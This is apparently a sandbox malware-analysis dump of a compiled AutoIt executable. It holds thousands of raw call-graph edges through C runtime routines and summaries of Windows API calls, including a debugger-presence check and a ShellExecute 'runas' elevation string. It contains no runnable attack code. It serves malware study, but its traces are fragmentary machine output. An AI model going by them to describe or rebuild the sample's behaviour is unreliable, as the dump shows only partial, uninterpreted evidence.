105327 920a6a 105322->105327 105324 920a20 105504 918b28 58 API calls __getptd_noexit 105324->105504 105505 918af4 58 API calls __getptd_noexit 105326->105505 105330 91d206 ___lock_fhandle 59 API calls 105327->105330 105328 920a65 105509 918b28 58 API calls __getptd_noexit 105328->105509 105332 920a70 105330->105332 105334 920a83 105332->105334 105335 920a8e 105332->105335 105333 920ac9 105510 918db6 9 API calls __setmode 105333->105510 105488 920add 105334->105488 105506 918b28 58 API calls __getptd_noexit 105335->105506 105338 920a27 __setmode 105338->105294 105340 920a89 105507 920ab5 LeaveCriticalSection __unlock_fhandle 105340->105507 105342->105284 105343->105288 105345 91d892 __setmode 105344->105345 105346 91d8b6 105345->105346 105347 91d89f 105345->105347 105348 91d955 105346->105348 105350 91d8ca 105346->105350 105445 918af4 58 API calls __getptd_noexit 105347->105445 105451 918af4 58 API calls __getptd_noexit 105348->105451 105353 91d8f2 105350->105353 105354 91d8e8 105350->105354 105352 91d8a4 105446 918b28 58 API calls __getptd_noexit 105352->105446 105372 91d206 105353->105372 105447 918af4 58 API calls __getptd_noexit 105354->105447 105355 91d8ed 105452 918b28 58 API calls __getptd_noexit 105355->105452 105359 91d8f8 105361 91d90b 105359->105361 105362 91d91e 105359->105362 105381 91d975 105361->105381 105448 918b28 58 API calls __getptd_noexit 105362->105448 105363 91d961 105453 918db6 9 API calls __setmode 105363->105453 105367 91d8ab __setmode 105367->105304 105368 91d917 105450 91d94d LeaveCriticalSection __unlock_fhandle 105368->105450 105369 91d923 105449 918af4 58 API calls __getptd_noexit 105369->105449 105373 91d212 __setmode 105372->105373 105374 91d261 EnterCriticalSection 105373->105374 105375 919c0b __lock 58 API calls 105373->105375 105376 91d287 __setmode 105374->105376 105377 91d237 105375->105377 105376->105359 105378 91d24f 105377->105378 105454 919e2b InitializeCriticalSectionAndSpinCount 105377->105454 105455 91d28b 
LeaveCriticalSection _doexit 105378->105455 105382 91d982 __write_nolock 105381->105382 105383 91d9c1 105382->105383 105384 91d9e0 105382->105384 105413 91d9b6 105382->105413 105465 918af4 58 API calls __getptd_noexit 105383->105465 105387 91da38 105384->105387 105388 91da1c 105384->105388 105392 91da51 105387->105392 105471 9218c1 60 API calls 3 library calls 105387->105471 105468 918af4 58 API calls __getptd_noexit 105388->105468 105389 91e1d6 105389->105368 105390 91d9c6 105466 918b28 58 API calls __getptd_noexit 105390->105466 105456 925c6b 105392->105456 105394 91da21 105469 918b28 58 API calls __getptd_noexit 105394->105469 105396 91d9cd 105467 918db6 9 API calls __setmode 105396->105467 105400 91da5f 105401 91ddb8 105400->105401 105472 9199ac 58 API calls 2 library calls 105400->105472 105403 91ddd6 105401->105403 105404 91e14b WriteFile 105401->105404 105402 91da28 105470 918db6 9 API calls __setmode 105402->105470 105407 91defa 105403->105407 105415 91ddec 105403->105415 105408 91ddab GetLastError 105404->105408 105412 91dd78 105404->105412 105419 91dfef 105407->105419 105421 91df05 105407->105421 105408->105412 105409 91da8b GetConsoleMode 105409->105401 105411 91daca 105409->105411 105410 91e184 105410->105413 105477 918b28 58 API calls __getptd_noexit 105410->105477 105411->105401 105414 91dada GetConsoleCP 105411->105414 105412->105410 105412->105413 105418 91ded8 105412->105418 105479 91c5f6 105413->105479 105414->105410 105442 91db09 105414->105442 105415->105410 105416 91de5b WriteFile 105415->105416 105416->105408 105420 91de98 105416->105420 105423 91dee3 105418->105423 105424 91e17b 105418->105424 105419->105410 105425 91e064 WideCharToMultiByte 105419->105425 105420->105415 105426 91debc 105420->105426 105421->105410 105427 91df6a WriteFile 105421->105427 105422 91e1b2 105478 918af4 58 API calls __getptd_noexit 105422->105478 105474 918b28 58 API calls __getptd_noexit 105423->105474 105476 918b07 58 API calls 3 library calls 105424->105476 
105425->105408 105437 91e0ab 105425->105437 105426->105412 105427->105408 105429 91dfb9 105427->105429 105429->105412 105429->105421 105429->105426 105432 91dee8 105475 918af4 58 API calls __getptd_noexit 105432->105475 105433 91e0b3 WriteFile 105436 91e106 GetLastError 105433->105436 105433->105437 105436->105437 105437->105412 105437->105419 105437->105426 105437->105433 105438 927a5e WriteConsoleW CreateFileW __putwch_nolock 105443 91dc5f 105438->105443 105439 9262ba 60 API calls __write_nolock 105439->105442 105440 91dbf2 WideCharToMultiByte 105440->105412 105441 91dc2d WriteFile 105440->105441 105441->105408 105441->105443 105442->105412 105442->105439 105442->105440 105442->105443 105473 9135f5 58 API calls __isleadbyte_l 105442->105473 105443->105408 105443->105412 105443->105438 105443->105442 105444 91dc87 WriteFile 105443->105444 105444->105408 105444->105443 105445->105352 105446->105367 105447->105355 105448->105369 105449->105368 105450->105367 105451->105355 105452->105363 105453->105367 105454->105378 105455->105374 105457 925c83 105456->105457 105458 925c76 105456->105458 105461 925c8f 105457->105461 105462 918b28 __setmode 58 API calls 105457->105462 105459 918b28 __setmode 58 API calls 105458->105459 105460 925c7b 105459->105460 105460->105400 105461->105400 105463 925cb0 105462->105463 105464 918db6 __setmode 9 API calls 105463->105464 105464->105460 105465->105390 105466->105396 105467->105413 105468->105394 105469->105402 105470->105413 105471->105392 105472->105409 105473->105442 105474->105432 105475->105413 105476->105413 105477->105422 105478->105413 105480 91c600 IsProcessorFeaturePresent 105479->105480 105481 91c5fe 105479->105481 105483 92590a 105480->105483 105481->105389 105484 9258b9 ___raise_securityfailure 5 API calls 105483->105484 105485 9259ed 105484->105485 105485->105389 105486->105313 105487->105315 105511 91d4c3 105488->105511 105490 920b41 105524 91d43d 59 API calls 2 library calls 105490->105524 105492 920aeb 105492->105490 
105493 91d4c3 __lseek_nolock 58 API calls 105492->105493 105502 920b1f 105492->105502 105497 920b16 105493->105497 105494 91d4c3 __lseek_nolock 58 API calls 105498 920b2b CloseHandle 105494->105498 105495 920b6b 105495->105340 105496 920b49 105496->105495 105525 918b07 58 API calls 3 library calls 105496->105525 105501 91d4c3 __lseek_nolock 58 API calls 105497->105501 105498->105490 105499 920b37 GetLastError 105498->105499 105499->105490 105501->105502 105502->105490 105502->105494 105503->105324 105504->105338 105505->105328 105506->105340 105507->105338 105508->105328 105509->105333 105510->105338 105512 91d4ce 105511->105512 105514 91d4e3 105511->105514 105526 918af4 58 API calls __getptd_noexit 105512->105526 105518 91d508 105514->105518 105528 918af4 58 API calls __getptd_noexit 105514->105528 105515 91d4d3 105527 918b28 58 API calls __getptd_noexit 105515->105527 105518->105492 105519 91d512 105529 918b28 58 API calls __getptd_noexit 105519->105529 105520 91d4db 105520->105492 105522 91d51a 105530 918db6 9 API calls __setmode 105522->105530 105524->105496 105525->105495 105526->105515 105527->105520 105528->105519 105529->105522 105530->105520 105730 8f4bb5 105531->105730 105536 92d8e6 105539 8f4e4a 84 API calls 105536->105539 105537 8f4e08 LoadLibraryExW 105740 8f4b6a 105537->105740 105541 92d8ed 105539->105541 105543 8f4b6a 3 API calls 105541->105543 105545 92d8f5 105543->105545 105544 8f4e2f 105544->105545 105546 8f4e3b 105544->105546 105766 8f4f0b 105545->105766 105548 8f4e4a 84 API calls 105546->105548 105550 8f4e40 105548->105550 105550->105058 105550->105061 105552 92d91c 105774 8f4ec7 105552->105774 105556 8f7667 59 API calls 105555->105556 105557 8f45b1 105556->105557 105558 8f7667 59 API calls 105557->105558 105559 8f45b9 105558->105559 105560 8f7667 59 API calls 105559->105560 105561 8f45c1 105560->105561 105562 8f7667 59 API calls 105561->105562 105563 8f45c9 105562->105563 105564 92d4d2 105563->105564 105565 8f45fd 105563->105565 105566 8f8047 
59 API calls 105564->105566 105567 8f784b 59 API calls 105565->105567 105568 92d4db 105566->105568 105569 8f460b 105567->105569 105570 8f7d8c 59 API calls 105568->105570 105571 8f7d2c 59 API calls 105569->105571 105573 8f4640 105570->105573 105572 8f4615 105571->105572 105572->105573 105574 8f784b 59 API calls 105572->105574 105575 8f4680 105573->105575 105577 8f465f 105573->105577 105588 92d4fb 105573->105588 105578 8f4636 105574->105578 105576 8f784b 59 API calls 105575->105576 105579 8f4691 105576->105579 105582 8f79f2 59 API calls 105577->105582 105581 8f7d2c 59 API calls 105578->105581 105583 8f46a3 105579->105583 105586 8f8047 59 API calls 105579->105586 105580 92d5cb 105584 8f7bcc 59 API calls 105580->105584 105581->105573 105585 8f4669 105582->105585 105587 8f46b3 105583->105587 105589 8f8047 59 API calls 105583->105589 105601 92d588 105584->105601 105585->105575 105592 8f784b 59 API calls 105585->105592 105586->105583 105591 8f46ba 105587->105591 105593 8f8047 59 API calls 105587->105593 105588->105580 105590 92d5b4 105588->105590 105600 92d532 105588->105600 105589->105587 105590->105580 105596 92d59f 105590->105596 105594 8f8047 59 API calls 105591->105594 105603 8f46c1 Mailbox 105591->105603 105592->105575 105593->105591 105594->105603 105595 8f79f2 59 API calls 105595->105601 105599 8f7bcc 59 API calls 105596->105599 105597 92d590 105598 8f7bcc 59 API calls 105597->105598 105598->105601 105599->105601 105600->105597 105604 92d57b 105600->105604 105601->105575 105601->105595 105940 8f7924 59 API calls 2 library calls 105601->105940 105603->105089 105605 8f7bcc 59 API calls 105604->105605 105605->105601 105607 8f7e4f 59 API calls 105606->105607 105608 8f79fd 105607->105608 105608->105096 105608->105098 105610 92ec6b 105609->105610 105611 8f7b40 105609->105611 105947 947bdb 59 API calls _memmove 105610->105947 105941 8f7a51 105611->105941 105614 8f7b4c 105614->105105 105615 92ec75 105616 8f8047 59 API calls 105615->105616 105617 92ec7d Mailbox 
105616->105617 105619 95408d 105618->105619 105620 9540a0 105619->105620 105621 954092 105619->105621 105623 8f7667 59 API calls 105620->105623 105622 8f8047 59 API calls 105621->105622 105671 95409b Mailbox 105622->105671 105624 9540a8 105623->105624 105625 8f7667 59 API calls 105624->105625 105626 9540b0 105625->105626 105627 8f7667 59 API calls 105626->105627 105628 9540bb 105627->105628 105629 8f7667 59 API calls 105628->105629 105630 9540c3 105629->105630 105631 8f7667 59 API calls 105630->105631 105632 9540cb 105631->105632 105633 8f7667 59 API calls 105632->105633 105634 9540d3 105633->105634 105635 8f7667 59 API calls 105634->105635 105636 9540db 105635->105636 105637 8f7667 59 API calls 105636->105637 105638 9540e3 105637->105638 105639 8f459b 59 API calls 105638->105639 105640 9540fa 105639->105640 105641 8f459b 59 API calls 105640->105641 105642 954113 105641->105642 105643 8f79f2 59 API calls 105642->105643 105644 95411f 105643->105644 105645 954132 105644->105645 105646 8f7d2c 59 API calls 105644->105646 105647 8f79f2 59 API calls 105645->105647 105646->105645 105648 95413b 105647->105648 105649 95414b 105648->105649 105650 8f7d2c 59 API calls 105648->105650 105651 8f8047 59 API calls 105649->105651 105650->105649 105652 954157 105651->105652 105653 8f7b2e 59 API calls 105652->105653 105654 954163 105653->105654 105948 954223 59 API calls 105654->105948 105656 954172 105949 954223 59 API calls 105656->105949 105658 954185 105659 8f79f2 59 API calls 105658->105659 105660 95418f 105659->105660 105661 954194 105660->105661 105662 9541a6 105660->105662 105663 8f7cab 59 API calls 105661->105663 105664 8f79f2 59 API calls 105662->105664 105670 9541a1 105663->105670 105665 9541af 105664->105665 105666 9541cd 105665->105666 105669 8f7cab 59 API calls 105665->105669 105668 8f7b2e 59 API calls 105666->105668 105667 8f7b2e 59 API calls 105667->105666 105668->105671 105669->105670 105670->105667 105671->105113 105673 959162 __write_nolock 105672->105673 105674 
910db6 Mailbox 59 API calls 105673->105674 105675 9591bf 105674->105675 105676 8f522e 59 API calls 105675->105676 105677 9591c9 105676->105677 105678 958f5f GetSystemTimeAsFileTime 105677->105678 105679 9591d4 105678->105679 105680 8f4ee5 85 API calls 105679->105680 105681 9591e7 _wcscmp 105680->105681 105682 9592b8 105681->105682 105683 95920b 105681->105683 105684 959734 96 API calls 105682->105684 105967 959734 105683->105967 105700 959284 _wcscat 105684->105700 105688 8f4f0b 74 API calls 105690 9592dd 105688->105690 105689 9592c1 105689->105120 105691 8f4f0b 74 API calls 105690->105691 105693 9592ed 105691->105693 105692 959239 _wcscat _wcscpy 105974 9140fb 58 API calls __wsplitpath_helper 105692->105974 105694 8f4f0b 74 API calls 105693->105694 105696 959308 105694->105696 105697 8f4f0b 74 API calls 105696->105697 105698 959318 105697->105698 105699 8f4f0b 74 API calls 105698->105699 105701 959333 105699->105701 105700->105688 105700->105689 105702 8f4f0b 74 API calls 105701->105702 105703 959343 105702->105703 105704 8f4f0b 74 API calls 105703->105704 105705 959353 105704->105705 105706 8f4f0b 74 API calls 105705->105706 105707 959363 105706->105707 105950 9598e3 GetTempPathW GetTempFileNameW 105707->105950 105709 95936f 105710 91525b 115 API calls 105709->105710 105718 959380 105710->105718 105711 9153a6 __fcloseall 83 API calls 105712 959445 105711->105712 105714 95945f 105712->105714 105715 95944b DeleteFileW 105712->105715 105713 8f4f0b 74 API calls 105713->105718 105716 959505 CopyFileW 105714->105716 105717 959469 _wcsncpy 105714->105717 105715->105689 105719 95952d DeleteFileW 105716->105719 105720 95951b DeleteFileW 105716->105720 105975 958b06 116 API calls __fcloseall 105717->105975 105718->105689 105718->105713 105725 95943a 105718->105725 105951 914863 105718->105951 105720->105689 105725->105711 105727->105046 105728->105082 105729->105095 105779 8f4c03 105730->105779 105733 8f4bdc 105735 8f4bec FreeLibrary 105733->105735 105736 8f4bf5 
105733->105736 105734 8f4c03 2 API calls 105734->105733 105735->105736 105737 91525b 105736->105737 105783 915270 105737->105783 105739 8f4dfc 105739->105536 105739->105537 105864 8f4c36 105740->105864 105743 8f4c36 2 API calls 105746 8f4b8f 105743->105746 105744 8f4baa 105747 8f4c70 105744->105747 105745 8f4ba1 FreeLibrary 105745->105744 105746->105744 105746->105745 105748 910db6 Mailbox 59 API calls 105747->105748 105749 8f4c85 105748->105749 105750 8f522e 59 API calls 105749->105750 105751 8f4c91 _memmove 105750->105751 105752 8f4ccc 105751->105752 105753 8f4d89 105751->105753 105754 8f4dc1 105751->105754 105755 8f4ec7 69 API calls 105752->105755 105868 8f4e89 CreateStreamOnHGlobal 105753->105868 105879 95991b 95 API calls 105754->105879 105758 8f4cd5 105755->105758 105759 8f4f0b 74 API calls 105758->105759 105761 92d8a7 105758->105761 105765 8f4d69 105758->105765 105874 8f4ee5 105758->105874 105759->105758 105762 8f4ee5 85 API calls 105761->105762 105763 92d8bb 105762->105763 105764 8f4f0b 74 API calls 105763->105764 105764->105765 105765->105544 105767 8f4f1d 105766->105767 105768 92d9cd 105766->105768 105897 9155e2 105767->105897 105771 959109 105917 958f5f 105771->105917 105773 95911f 105773->105552 105775 92d990 105774->105775 105776 8f4ed6 105774->105776 105922 915c60 105776->105922 105778 8f4ede 105780 8f4bd0 105779->105780 105781 8f4c0c LoadLibraryA 105779->105781 105780->105733 105780->105734 105781->105780 105782 8f4c1d GetProcAddress 105781->105782 105782->105780 105784 91527c __setmode 105783->105784 105785 91528f 105784->105785 105788 9152c0 105784->105788 105832 918b28 58 API calls __getptd_noexit 105785->105832 105787 915294 105833 918db6 9 API calls __setmode 105787->105833 105802 9204e8 105788->105802 105791 9152c5 105792 9152db 105791->105792 105793 9152ce 105791->105793 105795 915305 105792->105795 105796 9152e5 105792->105796 105834 918b28 58 API calls __getptd_noexit 105793->105834 105817 920607 105795->105817 105835 918b28 58 API calls 
__getptd_noexit 105796->105835 105799 91529f @_EH4_CallFilterFunc@8 __setmode 105799->105739 105803 9204f4 __setmode 105802->105803 105804 919c0b __lock 58 API calls 105803->105804 105815 920502 105804->105815 105805 920576 105837 9205fe 105805->105837 105806 92057d 105842 91881d 58 API calls 2 library calls 105806->105842 105809 920584 105809->105805 105843 919e2b InitializeCriticalSectionAndSpinCount 105809->105843 105810 9205f3 __setmode 105810->105791 105812 919c93 __mtinitlocknum 58 API calls 105812->105815 105814 9205aa EnterCriticalSection 105814->105805 105815->105805 105815->105806 105815->105812 105840 916c50 59 API calls __lock 105815->105840 105841 916cba LeaveCriticalSection LeaveCriticalSection _doexit 105815->105841 105818 920627 __wopenfile 105817->105818 105819 920641 105818->105819 105831 9207fc 105818->105831 105850 9137cb 60 API calls 2 library calls 105818->105850 105848 918b28 58 API calls __getptd_noexit 105819->105848 105821 920646 105849 918db6 9 API calls __setmode 105821->105849 105823 915310 105836 915332 LeaveCriticalSection LeaveCriticalSection _fseek 105823->105836 105824 92085f 105845 9285a1 105824->105845 105827 9207f5 105827->105831 105851 9137cb 60 API calls 2 library calls 105827->105851 105829 920814 105829->105831 105852 9137cb 60 API calls 2 library calls 105829->105852 105831->105819 105831->105824 105832->105787 105833->105799 105834->105799 105835->105799 105836->105799 105844 919d75 LeaveCriticalSection 105837->105844 105839 920605 105839->105810 105840->105815 105841->105815 105842->105809 105843->105814 105844->105839 105853 927d85 105845->105853 105847 9285ba 105847->105823 105848->105821 105849->105823 105850->105827 105851->105829 105852->105831 105854 927d91 __setmode 105853->105854 105855 927da7 105854->105855 105858 927ddd 105854->105858 105856 918b28 __setmode 58 API calls 105855->105856 105857 927dac 105856->105857 105859 918db6 __setmode 9 API calls 105857->105859 105860 927e4e __wsopen_nolock 109 API calls 
105858->105860 105863 927db6 __setmode 105859->105863 105861 927df9 105860->105861 105862 927e22 __wsopen_helper LeaveCriticalSection 105861->105862 105862->105863 105863->105847 105865 8f4b83 105864->105865 105866 8f4c3f LoadLibraryA 105864->105866 105865->105743 105865->105746 105866->105865 105867 8f4c50 GetProcAddress 105866->105867 105867->105865 105869 8f4ea3 FindResourceExW 105868->105869 105873 8f4ec0 105868->105873 105870 92d933 LoadResource 105869->105870 105869->105873 105871 92d948 SizeofResource 105870->105871 105870->105873 105872 92d95c LockResource 105871->105872 105871->105873 105872->105873 105873->105752 105875 8f4ef4 105874->105875 105878 92d9ab 105874->105878 105880 91584d 105875->105880 105877 8f4f02 105877->105758 105879->105752 105881 915859 __setmode 105880->105881 105882 91586b 105881->105882 105884 915891 105881->105884 105893 918b28 58 API calls __getptd_noexit 105882->105893 105886 916c11 __lock_file 59 API calls 105884->105886 105885 915870 105894 918db6 9 API calls __setmode 105885->105894 105888 915897 105886->105888 105895 9157be 83 API calls 5 library calls 105888->105895 105890 9158a6 105896 9158c8 LeaveCriticalSection LeaveCriticalSection _fseek 105890->105896 105892 91587b __setmode 105892->105877 105893->105885 105894->105892 105895->105890 105896->105892 105900 9155fd 105897->105900 105899 8f4f2e 105899->105771 105901 915609 __setmode 105900->105901 105902 91564c 105901->105902 105903 915644 __setmode 105901->105903 105905 91561f _memset 105901->105905 105904 916c11 __lock_file 59 API calls 105902->105904 105903->105899 105907 915652 105904->105907 105913 918b28 58 API calls __getptd_noexit 105905->105913 105915 91541d 72 API calls 6 library calls 105907->105915 105908 915639 105914 918db6 9 API calls __setmode 105908->105914 105911 915668 105916 915686 LeaveCriticalSection LeaveCriticalSection _fseek 105911->105916 105913->105908 105914->105903 105915->105911 105916->105903 105920 91520a GetSystemTimeAsFileTime 105917->105920 
105919 958f6e 105919->105773 105921 915238 __aulldiv 105920->105921 105921->105919 105923 915c6c __setmode 105922->105923 105924 915c93 105923->105924 105925 915c7e 105923->105925 105926 916c11 __lock_file 59 API calls 105924->105926 105936 918b28 58 API calls __getptd_noexit 105925->105936 105928 915c99 105926->105928 105938 9158d0 67 API calls 6 library calls 105928->105938 105929 915c83 105937 918db6 9 API calls __setmode 105929->105937 105932 915ca4 105939 915cc4 LeaveCriticalSection LeaveCriticalSection _fseek 105932->105939 105934 915cb6 105935 915c8e __setmode 105934->105935 105935->105778 105936->105929 105937->105935 105938->105932 105939->105934 105940->105601 105942 8f7a5f 105941->105942 105946 8f7a85 _memmove 105941->105946 105943 910db6 Mailbox 59 API calls 105942->105943 105942->105946 105944 8f7ad4 105943->105944 105945 910db6 Mailbox 59 API calls 105944->105945 105945->105946 105946->105614 105947->105615 105948->105656 105949->105658 105950->105709 105952 91486f __setmode 105951->105952 105953 9148a5 105952->105953 105954 91488d 105952->105954 105956 91489d __setmode 105952->105956 105957 916c11 __lock_file 59 API calls 105953->105957 105988 918b28 58 API calls __getptd_noexit 105954->105988 105956->105718 105959 9148ab 105957->105959 105958 914892 105989 918db6 9 API calls __setmode 105958->105989 105976 91470a 105959->105976 105968 959748 __tzset_nolock _wcscmp 105967->105968 105969 959210 105968->105969 105970 8f4f0b 74 API calls 105968->105970 105971 959109 GetSystemTimeAsFileTime 105968->105971 105972 8f4ee5 85 API calls 105968->105972 105969->105689 105973 9140fb 58 API calls __wsplitpath_helper 105969->105973 105970->105968 105971->105968 105972->105968 105973->105692 105974->105700 105988->105958 105989->105956 106020 8f7a16 105994->106020 105996 8f646a 106027 8f750f 105996->106027 105998 8f6484 Mailbox 105998->105125 106001 8f7d8c 59 API calls 106015 8f6265 106001->106015 106002 8f750f 59 API calls 106002->106015 106003 92dff6 106037 
94f8aa 91 API calls 4 library calls 106003->106037 106007 92e004 106008 8f750f 59 API calls 106007->106008 106010 92e01a 106008->106010 106009 8f6799 _memmove 106038 94f8aa 91 API calls 4 library calls 106009->106038 106010->105998 106011 92df92 106012 8f8029 59 API calls 106011->106012 106014 92df9d 106012->106014 106018 910db6 Mailbox 59 API calls 106014->106018 106015->105996 106015->106001 106015->106002 106015->106003 106015->106009 106015->106011 106016 8f7e4f 59 API calls 106015->106016 106025 8f5f6c 60 API calls 106015->106025 106026 8f5d41 59 API calls Mailbox 106015->106026 106035 8f5e72 60 API calls 106015->106035 106036 8f7924 59 API calls 2 library calls 106015->106036 106017 8f643b CharUpperBuffW 106016->106017 106017->106015 106018->106009 106019->105129 106021 910db6 Mailbox 59 API calls 106020->106021 106022 8f7a3b 106021->106022 106023 8f8029 59 API calls 106022->106023 106024 8f7a4a 106023->106024 106024->106015 106025->106015 106026->106015 106028 8f75af 106027->106028 106032 8f7522 _memmove 106027->106032 106030 910db6 Mailbox 59 API calls 106028->106030 106029 910db6 Mailbox 59 API calls 106031 8f7529 106029->106031 106030->106032 106033 910db6 Mailbox 59 API calls 106031->106033 106034 8f7552 106031->106034 106032->106029 106033->106034 106034->105998 106035->106015 106036->106015 106037->106007 106038->105998 106040 953c3e 106039->106040 106041 954475 FindFirstFileW 106039->106041 106040->104976 106041->106040 106042 95448a FindClose 106041->106042 106042->106040 106043->105004 106044->104999 106045->104862 106046->104892 106047->104892 106048->104888 106049->104886 106050->104879 106051->104886 106052->104901 106053->104924 106054 917c56 106055 917c62 __setmode 106054->106055 106091 919e08 GetStartupInfoW 106055->106091 106057 917c67 106093 918b7c GetProcessHeap 106057->106093 106059 917cbf 106062 917cca 106059->106062 106176 917da6 58 API calls 3 library calls 106059->106176 106094 919ae6 106062->106094 106063 917cd0 106064 917cdb 
__RTC_Initialize 106063->106064 106177 917da6 58 API calls 3 library calls 106063->106177 106115 91d5d2 106064->106115 106067 917cea 106068 917cf6 GetCommandLineW 106067->106068 106178 917da6 58 API calls 3 library calls 106067->106178 106134 924f23 GetEnvironmentStringsW 106068->106134 106071 917cf5 106071->106068 106074 917d10 106075 917d1b 106074->106075 106179 9130b5 58 API calls 3 library calls 106074->106179 106144 924d58 106075->106144 106078 917d21 106079 917d2c 106078->106079 106180 9130b5 58 API calls 3 library calls 106078->106180 106158 9130ef 106079->106158 106082 917d34 106083 917d3f __wwincmdln 106082->106083 106181 9130b5 58 API calls 3 library calls 106082->106181 106164 8f47d0 106083->106164 106086 917d53 106087 917d62 106086->106087 106182 913358 58 API calls _doexit 106086->106182 106183 9130e0 58 API calls _doexit 106087->106183 106090 917d67 __setmode 106092 919e1e 106091->106092 106092->106057 106093->106059 106184 913187 36 API calls 2 library calls 106094->106184 106096 919aeb 106185 919d3c InitializeCriticalSectionAndSpinCount __ioinit 106096->106185 106098 919af4 106186 919b5c 61 API calls 2 library calls 106098->106186 106099 919af0 106099->106098 106187 919d8a TlsAlloc 106099->106187 106102 919af9 106102->106063 106103 919b06 106103->106098 106104 919b11 106103->106104 106188 9187d5 106104->106188 106107 919b53 106196 919b5c 61 API calls 2 library calls 106107->106196 106110 919b32 106110->106107 106112 919b38 106110->106112 106111 919b58 106111->106063 106195 919a33 58 API calls 4 library calls 106112->106195 106114 919b40 GetCurrentThreadId 106114->106063 106116 91d5de __setmode 106115->106116 106117 919c0b __lock 58 API calls 106116->106117 106118 91d5e5 106117->106118 106119 9187d5 __calloc_crt 58 API calls 106118->106119 106121 91d5f6 106119->106121 106120 91d661 GetStartupInfoW 106128 91d676 106120->106128 106129 91d7a5 106120->106129 106121->106120 106122 91d601 @_EH4_CallFilterFunc@8 __setmode 106121->106122 106122->106067 

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008F3B68
                                                                  • IsDebuggerPresent.KERNEL32 ref: 008F3B7A
                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,009B52F8,009B52E0,?,?), ref: 008F3BEB
                                                                    • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
                                                                    • Part of subcall function 0090092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008F3C14,009B52F8,?,?,?), ref: 0090096E
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 008F3C6F
                                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009A7770,00000010), ref: 0092D281
                                                                  • SetCurrentDirectoryW.KERNEL32(?,009B52F8,?,?,?), ref: 0092D2B9
                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,009A4260,009B52F8,?,?,?), ref: 0092D33F
                                                                  • ShellExecuteW.SHELL32(00000000,?,?), ref: 0092D346
                                                                    • Part of subcall function 008F3A46: GetSysColorBrush.USER32(0000000F), ref: 008F3A50
                                                                    • Part of subcall function 008F3A46: LoadCursorW.USER32(00000000,00007F00), ref: 008F3A5F
                                                                    • Part of subcall function 008F3A46: LoadIconW.USER32(00000063), ref: 008F3A76
                                                                    • Part of subcall function 008F3A46: LoadIconW.USER32(000000A4), ref: 008F3A88
                                                                    • Part of subcall function 008F3A46: LoadIconW.USER32(000000A2), ref: 008F3A9A
                                                                    • Part of subcall function 008F3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008F3AC0
                                                                    • Part of subcall function 008F3A46: RegisterClassExW.USER32(?), ref: 008F3B16
                                                                    • Part of subcall function 008F39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008F3A03
                                                                    • Part of subcall function 008F39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008F3A24
                                                                    • Part of subcall function 008F39D5: ShowWindow.USER32(00000000,?,?), ref: 008F3A38
                                                                    • Part of subcall function 008F39D5: ShowWindow.USER32(00000000,?,?), ref: 008F3A41
                                                                    • Part of subcall function 008F434A: _memset.LIBCMT ref: 008F4370
                                                                    • Part of subcall function 008F434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008F4415
                                                                  Strings
                                                                  • This is a third-party compiled AutoIt script., xrefs: 0092D279
                                                                  • runas, xrefs: 0092D33A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                  • String ID: This is a third-party compiled AutoIt script.$runas
                                                                  • API String ID: 529118366-3287110873
                                                                  • Opcode ID: c82ae248f7c7b82535d4d3792ba3221a933d1102fa1d99a526a06b38af3da1e1
                                                                  • Instruction ID: b08d1ffa5053bd6f62a26fa1c062d40de46a2725e2ed95773db6dbbc85fe2d47
                                                                  • Opcode Fuzzy Hash: c82ae248f7c7b82535d4d3792ba3221a933d1102fa1d99a526a06b38af3da1e1
                                                                  • Instruction Fuzzy Hash: 8451F13190D20CAAEF11EBB8ED16AFD7B78FF45724F004165F621F21A2DA704A45DB22

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetVersionExW.KERNEL32(?), ref: 008F49CD
                                                                    • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
                                                                  • GetCurrentProcess.KERNEL32(?,0097FAEC,00000000,00000000,?), ref: 008F4A9A
                                                                  • IsWow64Process.KERNEL32(00000000), ref: 008F4AA1
                                                                  • GetNativeSystemInfo.KERNELBASE(00000000), ref: 008F4AE7
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 008F4AF2
                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 008F4B23
                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 008F4B2F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
